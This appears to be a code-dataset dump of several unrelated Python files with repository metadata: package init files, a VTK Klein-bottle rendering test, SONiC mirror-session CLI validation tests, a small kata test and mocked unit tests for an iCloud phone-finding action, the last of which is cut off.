1b3814c3c117f76461859d73b330ff69e42bc731 | 117 | py | Python | params_proto/__init__.py | episodeyang/params_proto | 954031b7e1cec650ebc6db11feb64d7f5676d68f | [
"BSD-3-Clause"
] | 1 | 2021-02-12T15:51:11.000Z | 2021-02-12T15:51:11.000Z | params_proto/__init__.py | episodeyang/params_proto | 954031b7e1cec650ebc6db11feb64d7f5676d68f | [
"BSD-3-Clause"
] | 1 | 2022-01-25T06:20:28.000Z | 2022-01-25T06:20:28.000Z | params_proto/__init__.py | geyang/params_proto | 1bec0a412c97ea40d23e6aee955541f4a111626c | [
"BSD-3-Clause"
] | 1 | 2018-01-13T05:12:42.000Z | 2018-01-13T05:12:42.000Z | from . import hyper
from . import neo_hyper
from . import neo_proto
from . import utils
from .params_proto import *
| 16.714286 | 27 | 0.769231 | 18 | 117 | 4.833333 | 0.388889 | 0.45977 | 0.344828 | 0.413793 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.179487 | 117 | 6 | 28 | 19.5 | 0.90625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
1b396d9552c39dd9a08ec412aec798fbb202e0c1 | 9,482 | py | Python | IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/KlineBottle.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 4 | 2019-05-30T01:52:12.000Z | 2021-09-29T21:12:13.000Z | IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/KlineBottle.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | null | null | null | IMU/VTK-6.2.0/Filters/Modeling/Testing/Python/KlineBottle.py | timkrentz/SunTracker | 9a189cc38f45e5fbc4e4c700d7295a871d022795 | [
"MIT"
] | 2 | 2019-08-30T23:36:13.000Z | 2019-11-08T16:52:01.000Z | #!/usr/bin/env python
import vtk
from vtk.test import Testing
from vtk.util.misc import vtkGetDataRoot
VTK_DATA_ROOT = vtkGetDataRoot()
points = vtk.vtkPoints()
points.InsertNextPoint(0,-16,0)
points.InsertNextPoint(0,0,-14)
points.InsertNextPoint(0,0,14)
points.InsertNextPoint(14,0,0)
points.InsertNextPoint(10,20,-10)
points.InsertNextPoint(10,20,10)
points.InsertNextPoint(10,-20,-10)
points.InsertNextPoint(10,-20,10)
points.InsertNextPoint(-10,-20,-10)
points.InsertNextPoint(-10,-20,10)
points.InsertNextPoint(-10,20,-10)
points.InsertNextPoint(-10,20,10)
points.InsertNextPoint(-2,27,0)
points.InsertNextPoint(0,27,2)
points.InsertNextPoint(0,27,-2)
points.InsertNextPoint(2,27,0)
points.InsertNextPoint(-14,4,-1)
points.InsertNextPoint(-14,3,0)
points.InsertNextPoint(-14,5,0)
points.InsertNextPoint(-14,4,1)
points.InsertNextPoint(-1,38,-2)
points.InsertNextPoint(-1,38,2)
points.InsertNextPoint(2,35,-2)
points.InsertNextPoint(2,35,2)
points.InsertNextPoint(17,42,0)
points.InsertNextPoint(15,40,2)
points.InsertNextPoint(15,39,-2)
points.InsertNextPoint(13,37,0)
points.InsertNextPoint(19,-2,-2)
points.InsertNextPoint(19,-2,2)
points.InsertNextPoint(15,2,-2)
points.InsertNextPoint(15,2,2)
faces = vtk.vtkCellArray()
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(4)
faces.InsertCellPoint(5)
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(5)
faces.InsertCellPoint(7)
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(7)
faces.InsertCellPoint(6)
faces.InsertNextCell(3)
faces.InsertCellPoint(3)
faces.InsertCellPoint(6)
faces.InsertCellPoint(4)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(6)
faces.InsertCellPoint(7)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(7)
faces.InsertCellPoint(9)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(9)
faces.InsertCellPoint(8)
faces.InsertNextCell(3)
faces.InsertCellPoint(0)
faces.InsertCellPoint(8)
faces.InsertCellPoint(6)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(4)
faces.InsertCellPoint(6)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(6)
faces.InsertCellPoint(8)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(8)
faces.InsertCellPoint(10)
faces.InsertNextCell(3)
faces.InsertCellPoint(1)
faces.InsertCellPoint(10)
faces.InsertCellPoint(4)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(11)
faces.InsertCellPoint(9)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(9)
faces.InsertCellPoint(7)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(7)
faces.InsertCellPoint(5)
faces.InsertNextCell(3)
faces.InsertCellPoint(2)
faces.InsertCellPoint(5)
faces.InsertCellPoint(11)
faces.InsertNextCell(3)
faces.InsertCellPoint(4)
faces.InsertCellPoint(15)
faces.InsertCellPoint(5)
faces.InsertNextCell(3)
faces.InsertCellPoint(4)
faces.InsertCellPoint(14)
faces.InsertCellPoint(15)
faces.InsertNextCell(3)
faces.InsertCellPoint(5)
faces.InsertCellPoint(13)
faces.InsertCellPoint(11)
faces.InsertNextCell(3)
faces.InsertCellPoint(5)
faces.InsertCellPoint(15)
faces.InsertCellPoint(13)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(12)
faces.InsertCellPoint(10)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(13)
faces.InsertCellPoint(12)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(14)
faces.InsertCellPoint(4)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(12)
faces.InsertCellPoint(14)
faces.InsertNextCell(3)
faces.InsertCellPoint(8)
faces.InsertCellPoint(17)
faces.InsertCellPoint(16)
faces.InsertNextCell(3)
faces.InsertCellPoint(8)
faces.InsertCellPoint(9)
faces.InsertCellPoint(17)
faces.InsertNextCell(3)
faces.InsertCellPoint(9)
faces.InsertCellPoint(19)
faces.InsertCellPoint(17)
faces.InsertNextCell(3)
faces.InsertCellPoint(9)
faces.InsertCellPoint(11)
faces.InsertCellPoint(19)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(18)
faces.InsertCellPoint(19)
faces.InsertNextCell(3)
faces.InsertCellPoint(11)
faces.InsertCellPoint(10)
faces.InsertCellPoint(18)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(16)
faces.InsertCellPoint(18)
faces.InsertNextCell(3)
faces.InsertCellPoint(10)
faces.InsertCellPoint(8)
faces.InsertCellPoint(16)
faces.InsertNextCell(3)
faces.InsertCellPoint(13)
faces.InsertCellPoint(21)
faces.InsertCellPoint(12)
faces.InsertNextCell(3)
faces.InsertCellPoint(12)
faces.InsertCellPoint(21)
faces.InsertCellPoint(20)
faces.InsertNextCell(3)
faces.InsertCellPoint(12)
faces.InsertCellPoint(20)
faces.InsertCellPoint(14)
faces.InsertNextCell(3)
faces.InsertCellPoint(14)
faces.InsertCellPoint(20)
faces.InsertCellPoint(22)
faces.InsertNextCell(3)
faces.InsertCellPoint(14)
faces.InsertCellPoint(22)
faces.InsertCellPoint(15)
faces.InsertNextCell(3)
faces.InsertCellPoint(15)
faces.InsertCellPoint(22)
faces.InsertCellPoint(23)
faces.InsertNextCell(3)
faces.InsertCellPoint(15)
faces.InsertCellPoint(23)
faces.InsertCellPoint(13)
faces.InsertNextCell(3)
faces.InsertCellPoint(13)
faces.InsertCellPoint(23)
faces.InsertCellPoint(21)
faces.InsertNextCell(3)
faces.InsertCellPoint(21)
faces.InsertCellPoint(25)
faces.InsertCellPoint(24)
faces.InsertNextCell(3)
faces.InsertCellPoint(21)
faces.InsertCellPoint(24)
faces.InsertCellPoint(20)
faces.InsertNextCell(3)
faces.InsertCellPoint(20)
faces.InsertCellPoint(24)
faces.InsertCellPoint(26)
faces.InsertNextCell(3)
faces.InsertCellPoint(20)
faces.InsertCellPoint(26)
faces.InsertCellPoint(22)
faces.InsertNextCell(3)
faces.InsertCellPoint(22)
faces.InsertCellPoint(26)
faces.InsertCellPoint(27)
faces.InsertNextCell(3)
faces.InsertCellPoint(22)
faces.InsertCellPoint(27)
faces.InsertCellPoint(23)
faces.InsertNextCell(3)
faces.InsertCellPoint(23)
faces.InsertCellPoint(27)
faces.InsertCellPoint(25)
faces.InsertNextCell(3)
faces.InsertCellPoint(23)
faces.InsertCellPoint(25)
faces.InsertCellPoint(21)
faces.InsertNextCell(3)
faces.InsertCellPoint(25)
faces.InsertCellPoint(29)
faces.InsertCellPoint(24)
faces.InsertNextCell(3)
faces.InsertCellPoint(24)
faces.InsertCellPoint(29)
faces.InsertCellPoint(28)
faces.InsertNextCell(3)
faces.InsertCellPoint(24)
faces.InsertCellPoint(28)
faces.InsertCellPoint(26)
faces.InsertNextCell(3)
faces.InsertCellPoint(26)
faces.InsertCellPoint(28)
faces.InsertCellPoint(30)
faces.InsertNextCell(3)
faces.InsertCellPoint(26)
faces.InsertCellPoint(30)
faces.InsertCellPoint(27)
faces.InsertNextCell(3)
faces.InsertCellPoint(27)
faces.InsertCellPoint(30)
faces.InsertCellPoint(31)
faces.InsertNextCell(3)
faces.InsertCellPoint(27)
faces.InsertCellPoint(31)
faces.InsertCellPoint(25)
faces.InsertNextCell(3)
faces.InsertCellPoint(25)
faces.InsertCellPoint(31)
faces.InsertCellPoint(29)
faces.InsertNextCell(3)
faces.InsertCellPoint(29)
faces.InsertCellPoint(19)
faces.InsertCellPoint(17)
faces.InsertNextCell(3)
faces.InsertCellPoint(29)
faces.InsertCellPoint(17)
faces.InsertCellPoint(28)
faces.InsertNextCell(3)
faces.InsertCellPoint(28)
faces.InsertCellPoint(17)
faces.InsertCellPoint(16)
faces.InsertNextCell(3)
faces.InsertCellPoint(28)
faces.InsertCellPoint(16)
faces.InsertCellPoint(30)
faces.InsertNextCell(3)
faces.InsertCellPoint(30)
faces.InsertCellPoint(16)
faces.InsertCellPoint(18)
faces.InsertNextCell(3)
faces.InsertCellPoint(30)
faces.InsertCellPoint(18)
faces.InsertCellPoint(31)
faces.InsertNextCell(3)
faces.InsertCellPoint(31)
faces.InsertCellPoint(18)
faces.InsertCellPoint(19)
faces.InsertNextCell(3)
faces.InsertCellPoint(31)
faces.InsertCellPoint(19)
faces.InsertCellPoint(29)
model = vtk.vtkPolyData()
model.SetPolys(faces)
model.SetPoints(points)
# Create the RenderWindow, Renderer and both Actors
#
ren1 = vtk.vtkRenderer()
renWin = vtk.vtkRenderWindow()
renWin.AddRenderer(ren1)
iren = vtk.vtkRenderWindowInteractor()
iren.SetRenderWindow(renWin)
#vtkButterflySubdivisionFilter subdivide
subdivide = vtk.vtkLoopSubdivisionFilter()
subdivide.SetInputData(model)
subdivide.SetNumberOfSubdivisions(4)
mapper = vtk.vtkDataSetMapper()
mapper.SetInputConnection(subdivide.GetOutputPort())
rose = vtk.vtkLODActor()
rose.SetMapper(mapper)
fe = vtk.vtkFeatureEdges()
fe.SetInputConnection(subdivide.GetOutputPort())
fe.SetFeatureAngle(100)
feMapper = vtk.vtkPolyDataMapper()
feMapper.SetInputConnection(fe.GetOutputPort())
edges = vtk.vtkActor()
edges.SetMapper(feMapper)
# Add the actors to the renderer, set the background and size
#
ren1.AddActor(rose)
#ren1 AddActor edges
backP = vtk.vtkProperty()
backP.SetDiffuseColor(1,1,.3)
rose.SetBackfaceProperty(backP)
rose.GetProperty().SetDiffuseColor(1,.4,.3)
rose.GetProperty().SetSpecular(.4)
rose.GetProperty().SetDiffuse(.8)
rose.GetProperty().SetSpecularPower(40)
ren1.SetBackground(0.1,0.2,0.4)
renWin.SetSize(300,300)
# render the image
#
ren1.ResetCamera()
cam1 = ren1.GetActiveCamera()
cam1.Zoom(4.5)
cam1.Azimuth(-90)
ren1.ResetCameraClippingRange()
iren.Initialize()
# prevent the tk window from showing up then start the event loop
# --- end of script --
| 27.484058 | 66 | 0.796984 | 1,125 | 9,482 | 6.715556 | 0.121778 | 0.508273 | 0.189014 | 0.21178 | 0.810589 | 0.792852 | 0.792588 | 0.755923 | 0.17591 | 0.17591 | 0 | 0.066667 | 0.08089 | 9,482 | 344 | 67 | 27.563953 | 0.800229 | 0.030584 | 0 | 0.771084 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009036 | 0 | 0.009036 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
1b4e8ff47350a6eb68bf451228d9ba524fb5f184 | 135 | py | Python | tonks/ensemble/__init__.py | vanderveld/tonks | e87afbd9614b276b443b4a7527fd1fda01a8be4c | [
"BSD-3-Clause"
] | null | null | null | tonks/ensemble/__init__.py | vanderveld/tonks | e87afbd9614b276b443b4a7527fd1fda01a8be4c | [
"BSD-3-Clause"
] | null | null | null | tonks/ensemble/__init__.py | vanderveld/tonks | e87afbd9614b276b443b4a7527fd1fda01a8be4c | [
"BSD-3-Clause"
] | null | null | null | from tonks.ensemble.dataset import TonksEnsembleDataset
from tonks.ensemble.models import BertResnetEnsembleForMultiTaskClassification
| 45 | 78 | 0.911111 | 12 | 135 | 10.25 | 0.666667 | 0.146341 | 0.276423 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.059259 | 135 | 2 | 79 | 67.5 | 0.968504 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1b5b07e529a9f06e7ea6512266b636077a02ef5a | 12,037 | py | Python | tests/config_mirror_session_test.py | liuh-80/sonic-utilities | 3d3c89bd75e3c70881c64e2a59043177c56111b4 | [
"Apache-2.0"
] | null | null | null | tests/config_mirror_session_test.py | liuh-80/sonic-utilities | 3d3c89bd75e3c70881c64e2a59043177c56111b4 | [
"Apache-2.0"
] | null | null | null | tests/config_mirror_session_test.py | liuh-80/sonic-utilities | 3d3c89bd75e3c70881c64e2a59043177c56111b4 | [
"Apache-2.0"
] | null | null | null | import pytest
import config.main as config
from unittest import mock
from click.testing import CliRunner
ERR_MSG_IP_FAILURE = "does not appear to be an IPv4 or IPv6 network"
ERR_MSG_IP_VERSION_FAILURE = "not a valid IPv4 address"
ERR_MSG_GRE_TYPE_FAILURE = "not a valid GRE type"
ERR_MSG_VALUE_FAILURE = "Invalid value for"
def test_mirror_session_add():
runner = CliRunner()
# Verify invalid src_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "400.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid dst_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "256.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid ip version
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1::1", "2::2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_VERSION_FAILURE in result.stdout
# Verify invalid dscp
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "65536", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid ttl
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "256", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid gre
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65536", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "abcd", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
# Verify invalid queue
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65", "65536"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Positive case
with mock.patch('config.main.add_erspan') as mocked:
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 10, 100, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0X1234", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0x1234, 100, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0", "0"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0, 0, None)
def test_mirror_session_erspan_add():
runner = CliRunner()
# Verify invalid src_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "400.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid dst_ip
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "256.2.2.2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_FAILURE in result.stdout
# Verify invalid ip version
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1::1", "2::2", "8", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_IP_VERSION_FAILURE in result.stdout
# Verify invalid dscp
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "65536", "63", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid ttl
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "256", "10", "100"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid gre
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65536", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "abcd", "100"])
assert result.exit_code != 0
assert ERR_MSG_GRE_TYPE_FAILURE in result.stdout
# Verify invalid queue
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "1.1.1.1", "2.2.2.2", "6", "63", "65", "65536"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Positive case
with mock.patch('config.main.add_erspan') as mocked:
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "10", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 10, 100, None, None, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0x1234", "100"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0x1234, 100, None, None, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["erspan"].commands["add"],
["test_session", "100.1.1.1", "2.2.2.2", "8", "63", "0", "0"])
mocked.assert_called_with("test_session", "100.1.1.1", "2.2.2.2", 8, 63, 0, 0, None, None, None)
def test_mirror_session_span_add():
runner = CliRunner()
# Verify invalid queue
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet0", "Ethernet4", "rx", "65536"])
assert result.exit_code != 0
assert ERR_MSG_VALUE_FAILURE in result.stdout
# Verify invalid dst port
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethern", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethern is invalid" in result.stdout
# Verify destination port not have vlan config
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet24", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet24 has vlan config" in result.stdout
# Verify destination port is not part of portchannel
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet116", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet116 has portchannel config" in result.stdout
# Verify destination port not router interface
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet0", "Ethernet4", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet0 is a L3 interface" in result.stdout
# Verify destination port not Portchannel
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "PortChannel1001"])
assert result.exit_code != 0
assert "Error: Destination Interface PortChannel1001 is not supported" in result.output
# Verify source interface is invalid
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethern", "rx", "100"])
assert result.exit_code != 0
assert "Error: Source Interface Ethern is invalid" in result.stdout
# Verify source interface is not same as destination
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet52", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface cant be same as Source Interface" in result.stdout
# Verify destination port not have mirror config
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet44", "Ethernet56", "rx", "100"])
assert result.exit_code != 0
assert "Error: Destination Interface Ethernet44 already has mirror config" in result.output
# Verify source port is not configured as dstport in other session
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet44", "rx", "100"])
assert result.exit_code != 0
assert "Error: Source Interface Ethernet44 already has mirror config" in result.output
# Verify source port is not configured in same direction
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet8,Ethernet40", "rx", "100"])
assert result.exit_code != 0
assert "Error: Source Interface Ethernet40 already has mirror config in same direction" in result.output
# Verify direction is invalid
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet52", "Ethernet56", "px", "100"])
assert result.exit_code != 0
assert "Error: Direction px is invalid" in result.stdout
# Positive case
with mock.patch('config.main.add_span') as mocked:
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet8", "Ethernet4", "tx", "100"])
mocked.assert_called_with("test_session", "Ethernet8", "Ethernet4", "tx", 100, None)
result = runner.invoke(
config.config.commands["mirror_session"].commands["span"].commands["add"],
["test_session", "Ethernet0", "Ethernet4", "rx", "0"])
mocked.assert_called_with("test_session", "Ethernet0", "Ethernet4", "rx", 0, None)
| 44.581481 | 111 | 0.62798 | 1,580 | 12,037 | 4.649367 | 0.072152 | 0.021236 | 0.020419 | 0.117615 | 0.910155 | 0.887966 | 0.879662 | 0.858154 | 0.827525 | 0.820447 | 0 | 0.065978 | 0.211764 | 12,037 | 269 | 112 | 44.747212 | 0.708263 | 0.070283 | 0 | 0.751323 | 0 | 0 | 0.271864 | 0.003943 | 0 | 0 | 0.002151 | 0 | 0.338624 | 1 | 0.015873 | false | 0 | 0.021164 | 0 | 0.037037 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1b832210bdf2063c05cb17d9c581e350b6da7f06 | 163 | py | Python | codewars/6kyu/doha22/playing_digits/test.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | null | null | null | codewars/6kyu/doha22/playing_digits/test.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 2 | 2019-01-22T10:53:42.000Z | 2019-01-31T08:02:48.000Z | codewars/6kyu/doha22/playing_digits/test.py | doha22/Training_one | 0cd7cf86c7da0f6175834146296b763d1841766b | [
"MIT"
] | 13 | 2019-01-22T10:37:42.000Z | 2019-01-25T13:30:43.000Z | import unittest
from playing_digits import dig_pow
def test_dig_pow(benchmark):
assert benchmark(dig_pow,89,1) == 1
assert benchmark(dig_pow,92,1) == -1
| 20.375 | 40 | 0.742331 | 27 | 163 | 4.259259 | 0.518519 | 0.208696 | 0.313043 | 0.365217 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.058394 | 0.159509 | 163 | 7 | 41 | 23.285714 | 0.781022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.4 | 1 | 0.2 | false | 0 | 0.4 | 0 | 0.6 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
1bcb2d2330258a30d9492bce0b3a59309cb27c17 | 6,599 | py | Python | tests/test_actions/test_find_iphone.py | blacksparrow6/Melissa-Core | ea08ae5e3088360d3bddc40db72160697522b8f7 | [
"MIT"
] | 554 | 2015-12-10T12:08:50.000Z | 2022-02-24T02:56:11.000Z | tests/test_actions/test_find_iphone.py | Blackmancardinal/Blackman-II | fd143d7620c957cc8add5f8d176e0ed3735612c9 | [
"MIT"
] | 178 | 2016-01-07T06:26:17.000Z | 2020-04-23T20:41:07.000Z | tests/test_actions/test_find_iphone.py | Blackmancardinal/Blackman-II | fd143d7620c957cc8add5f8d176e0ed3735612c9 | [
"MIT"
] | 300 | 2015-12-16T13:23:29.000Z | 2022-03-20T04:21:07.000Z | """test find_iphone modulue."""
from unittest import TestCase
try: # py3
from unittest import mock
except ImportError: # py2
import mock
from pyicloud.exceptions import PyiCloudFailedLoginException
M_USERNAME = 'm_username'
M_PASSWORD = 'm_password'
def test_find_iphone():
"""test find_iphone func.
when given with all mocked dependencies,
find_iphone will only give warning
about there is no iphone in the given account.
"""
m_text = mock.Mock()
with mock.patch('melissa.profile_loader.load_profile'):
from melissa import profile
profile.data = {
'icloud': {'username': M_USERNAME, 'password': M_PASSWORD}}
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
from melissa.actions import find_iphone
find_iphone.profile.data = {
'icloud': {'username': M_USERNAME, 'password': M_PASSWORD}}
# run the func
find_iphone.find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('No iPhones found in your account')
class WithProfileTest(TestCase):
"""test case with profile."""
def test_find_iphone_with_profile(self):
"""test find_iphone func.
when given with all mocked dependencies,
find_iphone will only give warning
about there is no iphone in the given account.
"""
m_text = mock.Mock()
from melissa.actions import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
# run the func
find_iphone.find_iphone(m_text)
# testing.
m_pc_service.assert_called_once_with(M_USERNAME, M_PASSWORD)
m_tts.assert_called_once_with('No iPhones found in your account')
def test_find_iphone_with_a_phone(self):
"""test find_iphone func."""
m_text = mock.Mock()
m_device = mock.Mock()
m_device.status.return_value = {'deviceDisplayName': 'iPhone'}
from melissa.actions.find_iphone import find_iphone
with mock.patch('melissa.actions.find_iphone.PyiCloudService') \
as m_pc_service, \
mock.patch('melissa.actions.find_iphone.tts') as m_tts:
